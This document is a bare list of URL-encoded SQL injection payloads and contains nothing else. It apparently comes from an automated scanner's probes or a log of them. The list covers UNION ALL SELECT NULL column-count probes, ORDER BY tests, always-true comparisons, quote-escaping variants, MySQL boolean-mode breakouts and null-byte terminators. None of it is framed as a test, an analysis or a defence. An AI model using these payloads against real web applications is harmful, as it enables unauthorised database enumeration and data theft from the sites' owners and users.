-3465%20%2B%20%28SELECT%209604%20FROM%20DUAL%20WHERE%205672%3D5672%20UNION%20ALL%20SELECT%205672%2C%205672%2C%205672%2C%205672%2C%205672%2C%205672%2C%205672%2C%205672%00%20%29 -4367%20%2B%20%28SELECT%202303%20FROM%20DUAL%20WHERE%201491%3D1491%20UNION%20ALL%20SELECT%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%2C%201491%00%20%29 -1045%20%2B%20%28SELECT%204269%20FROM%20DUAL%20WHERE%203844%3D3844%20UNION%20ALL%20SELECT%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%2C%203844%00%20%29 -2152%20%2B%20%28SELECT%207679%20WHERE%203407%3D3407%20ORDER%20BY%201%00%20%29 -1371%20%2B%20%28SELECT%203713%20WHERE%209701%3D9701%20ORDER%20BY%204391%00%20%29 -5606%20%2B%20%28SELECT%207825%20WHERE%204025%3D4025%20UNION%20ALL%20SELECT%204025%00%20%29 -6004%20%2B%20%28SELECT%206535%20WHERE%201848%3D1848%20UNION%20ALL%20SELECT%201848%2C%201848%00%20%29 -9957%20%2B%20%28SELECT%209763%20WHERE%202727%3D2727%20UNION%20ALL%20SELECT%202727%2C%202727%2C%202727%00%20%29 -5512%20%2B%20%28SELECT%207752%20WHERE%207005%3D7005%20UNION%20ALL%20SELECT%207005%2C%207005%2C%207005%2C%207005%00%20%29 -4243%20%2B%20%28SELECT%204273%20WHERE%201138%3D1138%20UNION%20ALL%20SELECT%201138%2C%201138%2C%201138%2C%201138%2C%201138%00%20%29 -2439%20%2B%20%28SELECT%209348%20WHERE%209622%3D9622%20UNION%20ALL%20SELECT%209622%2C%209622%2C%209622%2C%209622%2C%209622%2C%209622%00%20%29 -1231%20%2B%20%28SELECT%209760%20WHERE%201759%3D1759%20UNION%20ALL%20SELECT%201759%2C%201759%2C%201759%2C%201759%2C%201759%2C%201759%2C%201759%00%20%29 -1866%20%2B%20%28SELECT%202613%20WHERE%209586%3D9586%20UNION%20ALL%20SELECT%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%00%20%29 -5135%20%2B%20%28SELECT%207096%20WHERE%207901%3D7901%20UNION%20ALL%20SELECT%207901%2C%207901%2C%207901%2C%207901%2C%207901%2C%207901%2C%207901%2C%207901%2C%207901%00%20%29 -2751%20%2B%20%28SELECT%204719%20WHERE%205440%3D5440%20UNION%20ALL%20SELECT%205440%2C%205440%2C%205440%2C%205440%2C%205440%2C%205440%2C%205440%2C%205440%2C%205440%2C%205440%00%20%29 -2963%27%20%2B%20%28SELECT%20%27pwHu%27%20FROM%20DUAL%20WHERE%209011%3D9011%20ORDER%20BY%201%00%20%29%20%2B%20%27 -3497%27%20%2B%20%28SELECT%20%27yKaQ%27%20FROM%20DUAL%20WHERE%201316%3D1316%20ORDER%20BY%204299%00%20%29%20%2B%20%27 -3828%27%20%2B%20%28SELECT%20%27LNvm%27%20FROM%20DUAL%20WHERE%209836%3D9836%20UNION%20ALL%20SELECT%209836%00%20%29%20%2B%20%27 -9148%27%20%2B%20%28SELECT%20%27ceFP%27%20FROM%20DUAL%20WHERE%208466%3D8466%20UNION%20ALL%20SELECT%208466%2C%208466%00%20%29%20%2B%20%27 -7153%27%20%2B%20%28SELECT%20%27cOzA%27%20FROM%20DUAL%20WHERE%202380%3D2380%20UNION%20ALL%20SELECT%202380%2C%202380%2C%202380%00%20%29%20%2B%20%27 -1592%27%20%2B%20%28SELECT%20%27xTRx%27%20FROM%20DUAL%20WHERE%206740%3D6740%20UNION%20ALL%20SELECT%206740%2C%206740%2C%206740%2C%206740%00%20%29%20%2B%20%27 -5179%27%20%2B%20%28SELECT%20%27SsoI%27%20FROM%20DUAL%20WHERE%206621%3D6621%20UNION%20ALL%20SELECT%206621%2C%206621%2C%206621%2C%206621%2C%206621%00%20%29%20%2B%20%27 -2071%27%20%2B%20%28SELECT%20%27Plot%27%20FROM%20DUAL%20WHERE%204872%3D4872%20UNION%20ALL%20SELECT%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%00%20%29%20%2B%20%27 -9510%27%20%2B%20%28SELECT%20%27Saww%27%20FROM%20DUAL%20WHERE%209900%3D9900%20UNION%20ALL%20SELECT%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%00%20%29%20%2B%20%27 -9564%27%20%2B%20%28SELECT%20%27VpEY%27%20FROM%20DUAL%20WHERE%202694%3D2694%20UNION%20ALL%20SELECT%202694%2C%202694%2C%202694%2C%202694%2C%202694%2C%202694%2C%202694%2C%202694%00%20%29%20%2B%20%27 -6826%27%20%2B%20%28SELECT%20%27txQl%27%20FROM%20DUAL%20WHERE%205175%3D5175%20UNION%20ALL%20SELECT%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%2C%205175%00%20%29%20%2B%20%27 -7489%27%20%2B%20%28SELECT%20%27PIiF%27%20FROM%20DUAL%20WHERE%205154%3D5154%20UNION%20ALL%20SELECT%205154%2C%205154%2C%205154%2C%205154%2C%205154%2C%205154%2C%205154%2C%205154%2C%205154%2C%205154%00%20%29%20%2B%20%27 -9720%27%20%2B%20%28SELECT%20%27slFJ%27%20WHERE%201515%3D1515%20ORDER%20BY%201%00%20%29%20%2B%20%27 -4166%27%20%2B%20%28SELECT%20%27dQIJ%27%20WHERE%203688%3D3688%20ORDER%20BY%201425%00%20%29%20%2B%20%27 -2365%27%20%2B%20%28SELECT%20%27zyAt%27%20WHERE%204128%3D4128%20UNION%20ALL%20SELECT%204128%00%20%29%20%2B%20%27 -5604%27%20%2B%20%28SELECT%20%27tqvs%27%20WHERE%206265%3D6265%20UNION%20ALL%20SELECT%206265%2C%206265%00%20%29%20%2B%20%27 -8435%27%20%2B%20%28SELECT%20%27oBdY%27%20WHERE%201512%3D1512%20UNION%20ALL%20SELECT%201512%2C%201512%2C%201512%00%20%29%20%2B%20%27 -8708%27%20%2B%20%28SELECT%20%27DvUk%27%20WHERE%205986%3D5986%20UNION%20ALL%20SELECT%205986%2C%205986%2C%205986%2C%205986%00%20%29%20%2B%20%27 -8697%27%20%2B%20%28SELECT%20%27WqoY%27%20WHERE%202381%3D2381%20UNION%20ALL%20SELECT%202381%2C%202381%2C%202381%2C%202381%2C%202381%00%20%29%20%2B%20%27 -3497%27%20%2B%20%28SELECT%20%27TrdB%27%20WHERE%208607%3D8607%20UNION%20ALL%20SELECT%208607%2C%208607%2C%208607%2C%208607%2C%208607%2C%208607%00%20%29%20%2B%20%27 -9551%27%20%2B%20%28SELECT%20%27jwsy%27%20WHERE%206751%3D6751%20UNION%20ALL%20SELECT%206751%2C%206751%2C%206751%2C%206751%2C%206751%2C%206751%2C%206751%00%20%29%20%2B%20%27 -7840%27%20%2B%20%28SELECT%20%27PoST%27%20WHERE%202575%3D2575%20UNION%20ALL%20SELECT%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%2C%202575%00%20%29%20%2B%20%27 -7964%27%20%2B%20%28SELECT%20%27WKTY%27%20WHERE%209949%3D9949%20UNION%20ALL%20SELECT%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%2C%209949%00%20%29%20%2B%20%27 -4238%27%20%2B%20%28SELECT%20%27DTDu%27%20WHERE%205803%3D5803%20UNION%20ALL%20SELECT%205803%2C%205803%2C%205803%2C%205803%2C%205803%2C%205803%2C%205803%2C%205803%2C%205803%2C%205803%00%20%29%20%2B%20%27 -1688%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201%00%20%23 -6354%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%206530%00%20%23 -7230%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203518%00%20%23 -7174%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209612%2C%209612%00%20%23 -8904%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204720%2C%204720%2C%204720%00%20%23 -3164%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207790%2C%207790%2C%207790%2C%207790%00%20%23 -7014%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203382%2C%203382%2C%203382%2C%203382%2C%203382%00%20%23 -2665%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209335%2C%209335%2C%209335%2C%209335%2C%209335%2C%209335%00%20%23 -5437%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207206%2C%207206%2C%207206%2C%207206%2C%207206%2C%207206%2C%207206%00%20%23 -1282%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%2C%209582%00%20%23 -5701%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205121%2C%205121%2C%205121%2C%205121%2C%205121%2C%205121%2C%205121%2C%205121%2C%205121%00%20%23 -5169%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%2C%204202%00%20%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%283217%3D3217 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%287251%3D7251 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284517%3D4517 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%283016%3D3016 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284996%3D4996 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%286503%3D6503 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%287577%3D7577 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%287531%3D7531 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%286913%3D6913 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%284472%3D4472 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%284572%3D4572 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%287861%3D7861 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%286529%3D6529 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%283143%3D3143 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%286206%3D6206 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%282632%3D2632 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%289088%3D9088 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%288672%3D8672 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%282094%3D2094 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%283944%3D3944 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%286232%3D6232 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281734%3D1734 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%287889%3D7889 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%281764%3D1764 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%286028%3D6028 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%282608%3D2608 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%285072%3D5072 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%284408%3D4408 